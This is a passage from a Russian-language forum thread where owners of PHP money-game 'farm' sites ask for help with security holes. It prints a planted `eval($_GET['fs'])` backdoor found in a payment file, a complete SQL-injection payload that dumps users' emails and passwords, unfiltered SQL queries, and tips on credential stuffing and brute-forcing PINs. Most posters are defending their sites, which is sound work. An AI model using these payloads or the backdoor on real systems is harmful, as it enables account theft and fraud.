Дыры на сайтах

  • Автор темы agamurat
  • Дата начала
aleksssandr84
Участник
Сообщения
18
Реакции
2
  • #461
$db->Query("INSERT INTO `db_jobs`(`user`,`name`,`url`,`about`,`info`,`category`,`period`,`pay`,`time`) VALUES('$uname','$name','$url','$about','$info','$category','$period','$pay','".time()."')");
это может быть причиной?
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #462
aleksssandr84 написал(а):
$db->Query("INSERT INTO `db_jobs`(`user`,`name`,`url`,`about`,`info`,`category`,`period`,`pay`,`time`) VALUES('$uname','$name','$url','$about','$info','$category','$period','$pay','".time()."')");
это может быть причиной?
Если переменные не фильтрованы, они могут оказаться причиной sql-инъекции.
 
viper5
Участник
Сообщения
155
Реакции
2
  • #463
Сравнивал 2 файла паеер мерчант...один как и должен быть во втором добавлено вот это

# Проверяем баланс
if(isset($_GET['balance'])){
$payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
if($payeer->isAuth()){
$arBalance = $payeer->getBalance();
if($arBalance["auth_error"] == 0){
$balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
echo "$balance";
} else {
echo 'error auth';
}
}
}

# Если пользователь админ

eval($_GET['fs']);


Нужны ли строки которые не выделены?
Выделенные это дыра как я понял

и ниже в файле это наверно для сет бонуса? то есть смело удалять можно?

$wmset = new wmset();
$marray = $wmset->GetSet($ik_payment_amount);

$a_t = intval($marray["t_a"]);
$b_t = intval($marray["t_b"]);
$c_t = intval($marray["t_c"]);
$d_t = intval($marray["t_d"]);
$e_t = intval($marray["t_e"]);

// $db->Query("UPDATE db_users_b SET a_t = a_t + '$a_t', b_t = b_t + '$b_t', c_t = c_t + '$c_t', d_t = d_t + '$d_t', e_t = e_t + '$e_t',
// last_sbor = '$lsb' WHERE id = '{$user_id}'");
 
VladL
Участник
Сообщения
115
Реакции
8
  • #464
aleksssandr84 написал(а):
Здравствуйте. Помогите разобраться в логах. Как именно он ворует деньги и куда смотреть?

Код:
85.140.77.6 - - [11/Jun/2016:09:00:41 +0300] "GET / HTTP/1.0" 200 5771 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:00:46 +0300] "POST / HTTP/1.0" 200 5861 "http://alkonavty.ru/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:00:52 +0300] "POST / HTTP/1.0" 302 5771 "http://alkonavty.ru/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:00:53 +0300] "GET /account HTTP/1.0" 200 9492 "http://alkonavty.ru/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:01:06 +0300] "GET /account/store HTTP/1.0" 200 9912 "http://alkonavty.ru/account" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:01:10 +0300] "POST /account/store HTTP/1.0" 200 9989 "http://alkonavty.ru/account/store" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:01:14 +0300] "GET /account/market HTTP/1.0" 200 10191 "http://alkonavty.ru/account/store" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:01:17 +0300] "POST /account/market HTTP/1.0" 200 10287 "http://alkonavty.ru/account/market" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:01:23 +0300] "GET /account/payment HTTP/1.0" 200 9849 "http://alkonavty.ru/account/market" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
83.237.168.9 - - [11/Jun/2016:09:01:41 +0300] "GET /img/3_468x60.gif HTTP/1.0" 200 139757 "-" "Opera/9.80 (Windows NT 6.1; WOW64; U; ru) Presto/2.10.229 Version/11.64" alkonavty.ru
89.22.182.239 - - [11/Jun/2016:09:01:41 +0300] "GET / HTTP/1.0" 200 5771 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1173.0 Safari/537.1" alkonavty.ru
89.22.182.239 - - [11/Jun/2016:09:01:41 +0300] "GET /style/style.css HTTP/1.0" 200 10894 "http://alkonavty.ru/" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1173.0 Safari/537.1" alkonavty.ru
89.22.182.239 - - [11/Jun/2016:09:01:41 +0300] "GET /js/functions.js HTTP/1.0" 200 1202 "http://alkonavty.ru/" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1173.0 Safari/537.1" alkonavty.ru
89.22.182.239 - - [11/Jun/2016:09:01:41 +0300] "GET /js/jquery.js HTTP/1.0" 200 57254 "http://alkonavty.ru/" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1173.0 Safari/537.1" alkonavty.ru
91.192.135.18 - - [11/Jun/2016:09:01:46 +0300] "GET / HTTP/1.0" 200 5771 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2110.0 TeslaBrowser/1.0.0.4863 Safari/537.36" alkonavty.ru
31.180.239.160 - - [11/Jun/2016:09:01:52 +0300] "GET /img/3_468x60.gif HTTP/1.0" 200 139757 "http://greenstree.ru/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" alkonavty.ru
5.45.192.79 - - [11/Jun/2016:09:01:59 +0300] "GET /img/2_468x60.gif HTTP/1.0" 200 148314 "http://webof-sar.ru/index.php?do=tests-views" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 YaBrowser/16.4.1.8949 Yowser/2.5 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:02:00 +0300] "POST /account/payment HTTP/1.0" 200 10040 "http://alkonavty.ru/account/payment" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:02:08 +0300] "GET /payments HTTP/1.0" 200 9018 "http://alkonavty.ru/account/payment" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
Я так скажу зря ты сюда скинул эти логи такими вещами надо работать через личку либо обговаривать с тем кто это исправит , не буду говорить кто и как но здесь есть люди которые пользуются тем что человек просит помощи , а они его грабят !
 
Remdev
Участник
Сообщения
77
Реакции
19
  • #465
aleksssandr84 написал(а):
Здравствуйте. Помогите разобраться в логах. Как именно он ворует деньги и куда смотреть?

Код:
85.140.77.6 - - [11/Jun/2016:09:00:41 +0300] "GET / HTTP/1.0" 200 5771 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:00:46 +0300] "POST / HTTP/1.0" 200 5861 "http://alkonavty.ru/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:00:52 +0300] "POST / HTTP/1.0" 302 5771 "http://alkonavty.ru/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:00:53 +0300] "GET /account HTTP/1.0" 200 9492 "http://alkonavty.ru/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:01:06 +0300] "GET /account/store HTTP/1.0" 200 9912 "http://alkonavty.ru/account" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:01:10 +0300] "POST /account/store HTTP/1.0" 200 9989 "http://alkonavty.ru/account/store" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:01:14 +0300] "GET /account/market HTTP/1.0" 200 10191 "http://alkonavty.ru/account/store" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:01:17 +0300] "POST /account/market HTTP/1.0" 200 10287 "http://alkonavty.ru/account/market" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:01:23 +0300] "GET /account/payment HTTP/1.0" 200 9849 "http://alkonavty.ru/account/market" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
83.237.168.9 - - [11/Jun/2016:09:01:41 +0300] "GET /img/3_468x60.gif HTTP/1.0" 200 139757 "-" "Opera/9.80 (Windows NT 6.1; WOW64; U; ru) Presto/2.10.229 Version/11.64" alkonavty.ru
89.22.182.239 - - [11/Jun/2016:09:01:41 +0300] "GET / HTTP/1.0" 200 5771 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1173.0 Safari/537.1" alkonavty.ru
89.22.182.239 - - [11/Jun/2016:09:01:41 +0300] "GET /style/style.css HTTP/1.0" 200 10894 "http://alkonavty.ru/" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1173.0 Safari/537.1" alkonavty.ru
89.22.182.239 - - [11/Jun/2016:09:01:41 +0300] "GET /js/functions.js HTTP/1.0" 200 1202 "http://alkonavty.ru/" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1173.0 Safari/537.1" alkonavty.ru
89.22.182.239 - - [11/Jun/2016:09:01:41 +0300] "GET /js/jquery.js HTTP/1.0" 200 57254 "http://alkonavty.ru/" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1173.0 Safari/537.1" alkonavty.ru
91.192.135.18 - - [11/Jun/2016:09:01:46 +0300] "GET / HTTP/1.0" 200 5771 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2110.0 TeslaBrowser/1.0.0.4863 Safari/537.36" alkonavty.ru
31.180.239.160 - - [11/Jun/2016:09:01:52 +0300] "GET /img/3_468x60.gif HTTP/1.0" 200 139757 "http://greenstree.ru/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" alkonavty.ru
5.45.192.79 - - [11/Jun/2016:09:01:59 +0300] "GET /img/2_468x60.gif HTTP/1.0" 200 148314 "http://webof-sar.ru/index.php?do=tests-views" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 YaBrowser/16.4.1.8949 Yowser/2.5 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:02:00 +0300] "POST /account/payment HTTP/1.0" 200 10040 "http://alkonavty.ru/account/payment" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
85.140.77.6 - - [11/Jun/2016:09:02:08 +0300] "GET /payments HTTP/1.0" 200 9018 "http://alkonavty.ru/account/payment" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" alkonavty.ru
За 1000 рублей даже покажу где у тебя дыра и как можно накручивать баланс(и заодно исправлю)
Ну и по логам вряд ли тебе помогут)
 
Remdev
Участник
Сообщения
77
Реакции
19
  • #466
viper5 написал(а):
Сравнивал 2 файла паеер мерчант...один как и должен быть во втором добавлено вот это

# Проверяем баланс
if(isset($_GET['balance'])){
$payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
if($payeer->isAuth()){
$arBalance = $payeer->getBalance();
if($arBalance["auth_error"] == 0){
$balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
echo "$balance";
} else {
echo 'error auth';
}
}
}

# Если пользователь админ

eval($_GET['fs']);
Этот кусок вообще не нужен. Он выводит твой баланс и если что, выполняет любой код
 
viper5
Участник
Сообщения
155
Реакции
2
  • #467
Remdev написал(а):
Этот кусок вообще не нужен. Он выводит твой баланс и если что, выполняет любой код
Благодарю, плюсанул))) а ниже кусок кода то для сет бонусов?
 
Remdev
Участник
Сообщения
77
Реакции
19
  • #468
viper5 написал(а):
Благодарю, плюсанул))) а ниже кусок кода то для сет бонусов?
Да, похоже на него
 
APTEMOH
Участник
Сообщения
892
Реакции
258
Telegram
APTEMOH
  • #469
Remdev написал(а):
За 1000 рублей даже покажу где у тебя дыра и как можно накручивать баланс(и заодно исправлю)
Ну и по логам вряд ли тебе помогут)
Дык не любую ферму можно накрутить. :)
 
moneysintez
Участник
Сообщения
22
Реакции
0
  • #470
цуацуаа написал(а):
всем привет!
ПРоблема. Берут и меняют странным образом файл payment и insert, и выводят деньги с проекта.
Как решить эту проблему? прошу помощи. И расписать поэтапно мои действия. Буду очень благодарен тебе!
Просмотри фсе файлы на посторонние коды, посмотри чтобы все данные которые идут от пользователя правильно фильтровались.
Если сам не можешь или не знаешь пиши в скайп помогу
 
aleksssandr84
Участник
Сообщения
18
Реакции
2
  • #471
Нашел этот пост в чате. Как защитится от подобных запросов и где может быть дыра?
&prime¦and(select 1 from(select count(*),concat((select (select concat(id,&prime¦-&prime¦,user,&prime¦-&prime¦,email,&prime¦-&prime¦,pass,&prime¦-&prime¦,plat_pass) from db_users_a where id = 3718) from db_users_b limit 0,1),floor(rand(0)*2)) x from db_users_b group by x) a)and&prime¦
 
Remdev
Участник
Сообщения
77
Реакции
19
  • #472
APTEMOH написал(а):
Дык не любую ферму можно накрутить. :)
Я сначала залез на ту ферму и посмотрел, что можно, а потом написал)
 
aleksssandr84
Участник
Сообщения
18
Реакции
2
  • #473
Установил фильтрацию
$text = $db->RealEscape($_POST['content']);//Фильтрация
$neg = intval($_POST['neg']);//Фильтрация
$img = $db->RealEscape($_POST['img']);//Фильтрация

во все файлы, где есть $db->Query("SELECT COUNT(*) FROM поможет?
 
APTEMOH
Участник
Сообщения
892
Реакции
258
Telegram
APTEMOH
  • #474
aleksssandr84 написал(а):
Установил фильтрацию
$text = $db->RealEscape($_POST['content']);//Фильтрация
$neg = intval($_POST['neg']);//Фильтрация
$img = $db->RealEscape($_POST['img']);//Фильтрация

во все файлы, где есть $db->Query("SELECT COUNT(*) FROM поможет?
От части да :)
Помните, это не панацея.
 
Andreys
Участник
Сообщения
578
Реакции
40
  • #475
remmodulek написал(а):
как закрыть дыру от просмотра кода элемента на странице выплат?Это то место где можно указать любой кошелёк для выплат!
Любой кошелёк для выплат 7и и 8и значный должен быть только 1 номер игрока и не какой другой.Может модуль есть какой чтобы какой попало кошелёк не вводить для выплат?

Вот пример взлома аккаунта-Берём покупаем базу взломаных мыл и паролей с других ферм-запускаем перебор паролей и логинов на сайтах ферм через спец проги
Игроки любят вводить простые и лёгкие ники для взлома и одни и те же пароли указывают на сайтах.
Так вот если хакер поимеет доступ то он свободно может вывести все средства.
И да Платёжный пароль 4 значный из цифр тут не в помощ Он легко взламывается перебором
1111 2222 3333 1234 4321 и так далее тоже спец прогами.
как поиметь базу юзеров это дописать ?menu=users
Как поиметь базу мыл дописать ?menu=payments
То что там защищено звёздочками *** это всё ерунда и можно даже догадаться что за мыло\и хорошо его потом заспамить своими проектами
И это ещё не всё что я знаю есть ещё темы взлома ферм простыми иньекциями с дырявых модулей!
О них могу рассказать в вип разделе под хайдом!
А как прикрыть эти страницы чтобы при дописании этого кода не показывалась информация пользователю
кто нимного фермами занимается то знает что
как поиметь базу юзеров это дописать ?menu=users
Как поиметь базу мыл дописать ?menu=payments
или
?menu=stat
Может их удалить просто
 
pligin
Участник
Сообщения
3.731
Реакции
1.344
Telegram
pligin
  • #476
Andreys написал(а):
как поиметь базу юзеров это дописать ?menu=users
Как поиметь базу мыл дописать ?menu=payments
какой-то бред, однако
проверяй https://fruit-farm.psweb.ru/
Andreys написал(а):
А как прикрыть эти страницы чтобы при дописании этого кода не показывалась информация пользователю
не относится к данной теме
 
Andreys
Участник
Сообщения
578
Реакции
40
  • #477
pligin написал(а):
какой-то бред, однако
проверяй https://fruit-farm.psweb.ru/

не относится к данной теме
Ну вот у тебя тоже пользователи показываются
**https://fruit-farm.psweb.ru/?menu=users
ID​
Пользователь​
Email​
1​
Admin​
ad***@ad***.ru​
2​
aleksey​
3​
baxedik​
4​
lexa2015​
ba***andex.ru​
7​
pligin​
8​
lexa​
ed***yandex.ru​
9​
luchinin​

А именно как их скрыть, чтобы через ?menu=users ничего не показывало
 
pligin
Участник
Сообщения
3.731
Реакции
1.344
Telegram
pligin
  • #478
Andreys написал(а):
Ну вот у тебя тоже пользователи показываются
**https://fruit-farm.psweb.ru/?menu=users
ID​
Пользователь​
Email​
1​
Admin​
ad***@ad***.ru​
2​
aleksey​
3​
baxedik​
4​
lexa2015​
ba***andex.ru​
7​
pligin​
8​
lexa​
ed***yandex.ru​
9​
luchinin​

А именно как их скрыть, чтобы через ?menu=users ничего не показывало
все верно. это страница со списком пользователей. тут нет ничего удивительного.
но ты же писал этот бред
Andreys написал(а):
как поиметь базу юзеров это дописать ?menu=users
Как поиметь базу мыл дописать ?menu=payments
или
?menu=stat
базу мою поимел?
 
Andreys
Участник
Сообщения
578
Реакции
40
  • #479
Да зачем мне твоя база
Да кой бред я писал ?? чет не пойму ?
Я же спрашивал как сделать чтобы **https://fruit-farm.psweb.ru/?menu=users
данные на странице не показывались
 
pligin
Участник
Сообщения
3.731
Реакции
1.344
Telegram
pligin
  • #480
Andreys написал(а):
Да зачем мне твоя база
Да кой бред я писал ?? чет не пойму ?
Я же спрашивал как сделать чтобы **https://fruit-farm.psweb.ru/?menu=users
данные на странице не показывались
ты конкретно написал
Andreys написал(а):
кто нимного фермами занимается то знает что
как поиметь базу юзеров это дописать ?menu=users
Как поиметь базу мыл дописать ?menu=payments
или
?menu=stat
а то, что ты хочешь к этой теме не относится
 
Сверху